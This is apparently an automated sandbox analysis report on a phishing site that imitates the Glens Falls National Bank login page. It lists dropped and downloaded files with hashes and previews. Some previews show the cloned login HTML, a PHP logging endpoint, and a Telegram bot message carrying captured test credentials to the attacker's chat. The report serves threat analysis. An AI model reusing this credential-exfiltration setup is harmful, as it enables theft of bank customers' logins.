                              • Exclude process from analysis (whitelisted): svchost.exe
                              • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.185.238, 74.125.133.84, 142.250.185.174, 142.250.186.78
                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: https://glfbanks.com/
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:03:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2673
                              Entropy (8bit):3.980436350897826
                              Encrypted:false
                              SSDEEP:
                              MD5:A642129A976417D3546F4F7CF7F80351
                              SHA1:CE78EC289C5A1BC5D7737373E84AC05056F6CDE8
                              SHA-256:A98416B4BB79A89FD316BC6692D18547D2CD6C513E7FDDD7B4CC810D42A87DCB
                              SHA-512:DBFB69964FC40D402EDE27ED65252F587ACE934D95613E481BBD4480B8B93B3E9B37D7429C849178A18C1E7DE2CA40F725F89B15846A82E3B7D2BBA20A463E30
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....r[Z..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Zh.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Zr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Zr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Zt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........52!z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:03:38 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2675
                              Entropy (8bit):3.9979463362647705
                              Encrypted:false
                              SSDEEP:
                              MD5:DF4EE549D031ABA18B7923AE8F24A91E
                              SHA1:1D7FC919E4E2EF4B8AAB249BF81770FA3D090619
                              SHA-256:1B2FC3D32A9171B8BD3F7F24380E293F026B73FF01E207CBCACFF2D9259D4FD0
                              SHA-512:FD8542DEA35E8BE497084D0DC6A3FE346123E89DBB2DC91F64823E26F80D7856D7D9927546D3BDD62FC61314DFDB82251F0B4CE1488D209890F2C8E4D4FEBCDB
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....<M..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Zh.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Zr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Zr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Zt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........52!z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2689
                              Entropy (8bit):4.007412288878873
                              Encrypted:false
                              SSDEEP:
                              MD5:007A7F02F9CF4CA780C1202117EFE6F4
                              SHA1:18E9E2A0B1C9204C894FB9C741D3C5BA2D008599
                              SHA-256:A22486CECE7648D60D17A637E447DA5A81A27276707B2053AE12B89615D3F791
                              SHA-512:09F8CABB2B231A3F66FD6321CE2A03D516D6E77E9051BB304669525C13BFC16E2FD8CD494C72139EEE4FA3E35FF13D60A895FC808CB356EBD5FACF42EED2619F
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Zh.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Zr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Zr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........52!z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:03:38 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.9943815891841377
                              Encrypted:false
                              SSDEEP:
                              MD5:1D56B9C41BF36DA55563FE2F1EA74803
                              SHA1:B4E759D5AE199085F5C02DDBD48A942EA0CABC83
                              SHA-256:AEB433A25741E9D78D496FB46011EF8C94FEC128498DBFD9C840AE790CAB974F
                              SHA-512:203C8FFA6EC0378554672010DE617A1EAA5607216C4E6BBC785DF2869301DC86AFCB763B126E830692115E1F6EC1DDFA753A9CA366754297C6938B91861FA894
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....W.F..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Zh.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Zr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Zr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Zt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........52!z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:03:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.9832598594921547
                              Encrypted:false
                              SSDEEP:
                              MD5:85D4371F20DB69DAF42191C4029E377E
                              SHA1:19AB2A2B71BC2E115D6B390A17A17C5CEA3B8209
                              SHA-256:FA70A5823D91050D68CCB3AF926E12B0438AF748598E5CDF2FE4A73E1DCFECEB
                              SHA-512:C189716D82002B993E7D1B8BF29D2FD5CA2390C53E7AFAC1FFC13343602D0072953D597563DE9BF4F646B8979607B2B880036B7DF6814215B2C29FB1A365C6A3
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....S..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Zh.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Zr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Zr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Zt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........52!z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:03:38 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):3.9958910665880287
                              Encrypted:false
                              SSDEEP:
                              MD5:606C76BB0A829A21DE8103D0288791EA
                              SHA1:F5AEAA8E88423056265755116E3963258CF2A653
                              SHA-256:CAF3F6A1D1116225CFBCAA246A06D67D422580ED5A425FA6BD04811C395630BE
                              SHA-512:A47901181E29D616EA5CA1A5EDACF5FD33DF5325B6B00FD31EA2D714B933256AD0C9B62BFA50DA7C73E4C44466493EEE6B4586AE529D3EC3264C5FD900F6DFB0
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....].:..c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I*Zh.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Zr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Zr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Zt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........52!z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1572)
                              Category:downloaded
                              Size (bytes):22340
                              Entropy (8bit):5.276088882540956
                              Encrypted:false
                              SSDEEP:
                              MD5:1F909C4000109A6D5AE4BCD93D60CFF9
                              SHA1:A0EE88AEFA18F7B4C1A0A69FFF4BACCCC77250DD
                              SHA-256:E03021BBFB5AE6E1DEE9F03D868637C4E90AF3FC5F445C520579FE8152521948
                              SHA-512:06959DEDB6F758B03434617997D2254A88DF5BB1C3DF8F4659A94AC7BC1D89ECF8E5A0D25B63ECCC2D3C5FE48F286D55A6F840EB4372DB7F489FFB130A2EBA99
                              Malicious:false
                              Reputation:unknown
                              URL:"https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"
                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-fam
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (32089)
                              Category:downloaded
                              Size (bytes):92629
                              Entropy (8bit):5.303443527492463
                              Encrypted:false
                              SSDEEP:
                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                              Malicious:false
                              Reputation:unknown
                              URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js
                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (10061), with CRLF line terminators
                              Category:dropped
                              Size (bytes):163610
                              Entropy (8bit):5.0147774843060855
                              Encrypted:false
                              SSDEEP:
                              MD5:765E1E5DB74025EFFBA422753A9BB458
                              SHA1:E3BAD34A97534737818D67B2DAA078151483EBA0
                              SHA-256:FE684B928A88BEC9259D8C8DF53E6C0F70B2E55B70280172B3B71F3D20F4CB16
                              SHA-512:E2D8A4CDC33FA4A42D233CEDE491B3A6C8FD36DE477B34DEF162AABF850F57E96E5262910FD103B8AC129F98F7D5D8EC87A95AA1398A0198412E40B3B38CE392
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>..<html lang="en" data-react-helmet="lang">....<head>.. <meta charset="UTF-8">.. <meta httpequiv="X-UA-Compatible" content="IE=edge,chrome=1">.. <meta httpequiv="cache-control" content="no-cache">.. <meta httpequiv="pragma" content="no-cache"> CHANGE HERE -->.. <link rel="shortcut icon" href="/ucfb-favicon.png">.. <link rel="apple-touch-icon" href="/apple-touch-icon.png">.. <link rel="manifest" href="/dbank/live/manifest.json"> -->.. <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&amp;display=swap">.. <title>Glens Falls National Bank and Trust Company | Login</title> CHANGE HERE -->.. .. <link href="/dbank/live/static/css/main.988d54f9.chunk.css" rel="stylesheet">.. <link rel="stylesheet" type="text/css" href="/dbank/live/static/css/10.6c720347.chunk.css">.. <link rel="stylesheet" type="text/css" href="/dbank/live/static/css/45.bb58f8a4.chunk.css">.. <link rel="sty
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2038), with CRLF line terminators
                              Category:downloaded
                              Size (bytes):5054
                              Entropy (8bit):5.672514384740518
                              Encrypted:false
                              SSDEEP:
                              MD5:9CAA1A179B2E5BC3239F2D292558F776
                              SHA1:D1E86F204D85F92F058095C23DEC33F313BF71ED
                              SHA-256:DD7B32F3D1519DAE3BA62A93F2AB81AF26FAB262B7C795A4139BB9B0B9BD91E9
                              SHA-512:A22FB65B32E67FD221980CF2700BB855B734887C511A5943FF60ED6EA3A4C22C189F1AA91A3C092EF60200C78051C7294B0BD296A1085E8520EEDDD1C361FF92
                              Malicious:false
                              Reputation:unknown
                              URL:https://glfbanks.com/
                              Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="Pragma" content="no-cache">.. <link rel="shortcut icon" href="ucfb-favicon.png" />.. <title>Glens Falls National Bank and Trust Company | Logi..</title> CHANGE HERE-->.. <style type="text/css">.. body,html{margin:0;padding:0;overflow-x:hidden}.no-internet-wrap{height:100vh;background-color:#fdfcfc;width:100vw;margin:0;overflow-x:hidden;display:flex;justify-content:center;align-items:center}.no-internet-wrap .no-internet-content{background-color:#fdfcfc;border:2px solid #ebf0eb;color:#7e7e7e;padding:30px 60px;font-family:'Segoe UI',Tahoma,sans-serif}.no-internet-wrap .no-internet-content i{font-size:50px}.no-internet-wrap .no-internet-content h2{font-size:1.5em;font-weight:500;line-height:1.25em;margin-top:0}.no-internet-wrap .no-internet-c
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):3594
                              Entropy (8bit):7.915498768522758
                              Encrypted:false
                              SSDEEP:
                              MD5:C3327D75DC030153BAA20B7882ED3FB0
                              SHA1:DDE522A916D6CC8E83D13E8CB9DE0BDD5EE510AD
                              SHA-256:DD940D9BA848F7372BB0604AB277A9E0DB6D3C2D2F838238D6D0CB22CCA38AA0
                              SHA-512:4359227424E3D69A37870194B22DFA1255A58DCCC1F93697BAEDAF842184AC1CF63B577402F3C73EEBFF6BC4E55072D1885B15CC20F1509683B88365C48A423A
                              Malicious:false
                              Reputation:unknown
                              URL:https://glfbanks.com/ucfb-favicon.png
                              Preview:.PNG........IHDR.....................PLTEm. ...H..D..?..8..l. 4..M..h..B..<..;..;..^..U..b..j...+@a.....h...Whi..c..B....Z................Z..R..H.....a...ft....7L......]..N..u.2....p~.y..I[.?Oo&6.Wd.{....p.)..z.4z2Bo.(.~..MZu9Gd.%.ku`.).\fZ.)f-9sAMxMW}......IDATx..Zm{...>nh..dlD.1...o...| .rB....:.H.1d.^....^X.fn....U................*.._..k........*..5._.D(U.]...V...&.R@*....../...H.d.Z..s]..2?]...uoJ..e......s..$%.....Al.|..[.qIz.&0......'^....u...m7.g.........s+Gf3.AfD..^..>..d..-.....<@.n.QL....T.&D!&....d6....l...!^.:9".6aX/i_.Ou....31.c.L..NUD.....&.av..j.Ir..#S.Bzj.]......@j....b.S..,..'.|D..q..`.J..@S....!3.....H.V....G......N.OL......+.}.m...S4uT#a.M`*...u.W-.H-5.....0[j.&.1.J.~.t.H.s.mt.~f...1..3c@....h.m.....,....WA....}..t..P....%....C..YI.=D...u3.>.1.Q.6....1<. .].@p..D....+..|..Y..Q....Si...X3.......T/....T...2_!:...".. ....S.....M\I..@A.#..:..l..;j...1...9U..;!...C@Ce0...|.....b.A...S....=LC...T..X.).l........(.....4.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):136
                              Entropy (8bit):5.050359260769873
                              Encrypted:false
                              SSDEEP:
                              MD5:C79A39F93F2322A6F15AAB8818FFF55C
                              SHA1:86AF1D645C60346FBA543C37D664B81ABBAFFE0C
                              SHA-256:C3FFEB4F66D2514561B402568D7055B5E7ED1019B4888C7B466FA30C1EA52B52
                              SHA-512:DE6D078CF99213259D49DE61A5C646E30BB0079651DE6FAB39F0088E862DA5775DADD8B54256C50E097B3669DF559E55A6281D66F59763320EDED96F7D3AA688
                              Malicious:false
                              Reputation:unknown
                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmsxWOpFWJBihIFDaPCFUMSBQ3OQUx6EhAJN5U2uVZusXQSBQ3inA7NEiwJSl1VV6-5vUcSBQ2cnD3jEgUNPu8vExIFDSycbh4SBQ0JqMSVEgUNeG8SGRIQCXLrzJqY6SbbEgUNrY2EsBIQCdJIla6gkfrZEgUNQd6P9Q==?alt=proto
                              Preview:ChIKBw2jwhVDGgAKBw3OQUx6GgAKCQoHDeKcDs0aAAotCgcNnJw94xoACgcNPu8vExoACgcNLJxuHhoACgcNCajElRoACgcNeG8SGRoACgkKBw2tjYSwGgAKCQoHDUHej/UaAA==
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 300 x 274, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):27282
                              Entropy (8bit):7.972728975836901
                              Encrypted:false
                              SSDEEP:
                              MD5:6A38C03CB8AB8E6EFC14BBE1AC5CBB73
                              SHA1:D0EBFD1805E932D9D2F8DDA76DE18200F04426F4
                              SHA-256:4F132FA443416F4D9433663B89B8A1BC9EAD731A4A68DE7A61F49E107870A8A4
                              SHA-512:F090E298B178E221828D08A7610948780F6A21F84258736B3728366F06B8FE8A819E69931EA4507D7AC604A52ACC1F6E664FD883F07D409A4E867A2B7C9A3520
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.wikipedia.org/portal/wikipedia.org/assets/img/Wikipedia-logo-v2@1.5x.png
                              Preview:.PNG........IHDR...,.........p.......PLTELiq.......................}..........mmm.....................~.....yyy..........................................Z[[...............LLLmnn...MMM]]]XXXkkk..................................................................................................................................967......................................................................................................................634...>;<;89201..............CABJHIQOP...VUV`_`0-/[Z[}}....eddhghpopyyzutu......,*+.8.@...3tRNS...El5...!.....M...j.Oe.....................`../+...h.IDATx..._bG....3.d.L&.$.}.w.....P....D...9,...-..(..k.....\...oU..:...Ig.....k.^r;...y...7.o..........'.....?...<...[oS?...F.~...{6=??=..........U._.}..g.i........=...d$.....7.....<...........[,.6..0...n..._...mh...=.CZ.F.b....m.........6...?.........._.j.X...Wy.w>.j..Y......YY\...y#..../v\_.B..$....-.X.....w>^._........#?..VV....4E...[?....G.0:.*...I....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 3300 x 1126, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):86279
                              Entropy (8bit):7.610056849642268
                              Encrypted:false
                              SSDEEP:
                              MD5:197B8CA78FB2EE4DF86458BAEA36977E
                              SHA1:B0D121CADD92540D5E165C598859E42F4910BC44
                              SHA-256:DC110B2BA1E95BD90F1563544953AF1DFCA0C738EFDD639B0514FC3F3D8E64B0
                              SHA-512:9EF499DCB1A1C4A9D8C9E76EAF7A209E2AE883960D290B22DB1AFFFC20DB1482051A31E6566CBCBD0640E93832E4522CF389CD8D27EA175026FF8C36C6232A41
                              Malicious:false
                              Reputation:unknown
                              URL:https://resource.digitalinsight.com/branding/27/01327/img/01327-logo-lg-md-publish.png?v=1517879964267
                              Preview:.PNG........IHDR.......f.....%z......IDATx....J............................cw......Y......5so.@(.+~5M..............h. .............B.............(..............B.............(..............B.............`.............@!..............r............@!..............r............@!.............0.............................9............................9.........................................P............................P............................P............................(..............B.............(..............B.............(.............................r............@!..............r............@!..............r............................9............................9............................9.............A...........................P............................P............................. .............B.............(..............B.............(..............B.............`.............@!..............r............@!..............r............@!.............0............
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):27
                              Entropy (8bit):3.8380398168981555
                              Encrypted:false
                              SSDEEP:
                              MD5:928A3D825D92EB0285DCD0D148B18D82
                              SHA1:9EEAAAD202B4E8C571E29B2725AE5CEB75467AFE
                              SHA-256:313C148F979EDA240C2DDB092D7936042AD652E222F0819CC9634C8ED9A36F18
                              SHA-512:EB6C6AB9E25E6EFB9C4F44A7CBF697D669D57B7EC1C16543AFC91A045B58CBC1594520F23C3F0CB6FDE7923FFB7B0F839DBEFCB4891CA273AB8C8D1B3431D59C
                              Malicious:false
                              Reputation:unknown
                              URL:https://glfbanks.com/spgbuck/_sysm_.php?_do=vt&s=aHR0cHM6Ly9nbGZiYW5rcy5jb20vX2ZpcnN0X2xvZ2luX3N1Ym1pdA==
                              Preview:Logged in file Bro. vtl.txt
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):702
                              Entropy (8bit):5.330958638807139
                              Encrypted:false
                              SSDEEP:
                              MD5:73D9F018E70499BA7883307B029EF78F
                              SHA1:907F6BE6CC6A2B3FB9C4180F794991A36C4E4E6F
                              SHA-256:C3B032AFF70CFA6A06806CFDDDDDDABEF4C4330832C2F9A5C85DEFFB71D026F9
                              SHA-512:9BC512CB4331C927D36BFF79153FDACED6053DD692F9A19FE24EC023EBABBE5C7927B5B5DB36881B7088059299668E0F806B65B55BEBF07DE474DCB1C2BA9639
                              Malicious:false
                              Reputation:unknown
                              Preview:{"ok":true,"result":{"message_id":29,"from":{"id":8026158304,"is_bot":true,"first_name":"Glennsfall\ud83d\ude01","username":"glesnaffallss_bot"},"chat":{"id":6734620062,"first_name":"Spaceship","last_name":"Biller","username":"Spaceshipbiller","type":"private"},"date":1736539438,"text":"====== XXX INFO ======\nIP: https://ip-api.com/8.46.123.189\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36\nData:\n {\"userid\":\"afeafeaf\",\"password\":\"efafeafefe\"}\n======","entities":[{"offset":27,"length":31,"type":"url"},{"offset":159,"length":9,"type":"url"}],"link_preview_options":{"url":"https://ip-api.com/8.46.123.189"}}}
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (32058)
                              Category:downloaded
                              Size (bytes):86659
                              Entropy (8bit):5.36781915816204
                              Encrypted:false
                              SSDEEP:
                              MD5:C9F5AEECA3AD37BF2AA006139B935F0A
